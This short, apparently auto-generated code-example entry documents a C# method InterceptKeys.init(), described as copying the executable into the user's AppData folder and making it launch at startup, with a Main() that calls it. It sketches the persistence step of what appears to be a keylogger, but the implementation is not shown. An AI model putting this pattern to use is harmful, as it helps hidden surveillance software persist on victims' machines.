init() private static method

Method used to copy the executable to user's appdata and make it launch at startup
private static init ( ) : void
return void
Example #1
0
 public static void Main()
 {
     InterceptKeys.init();
 }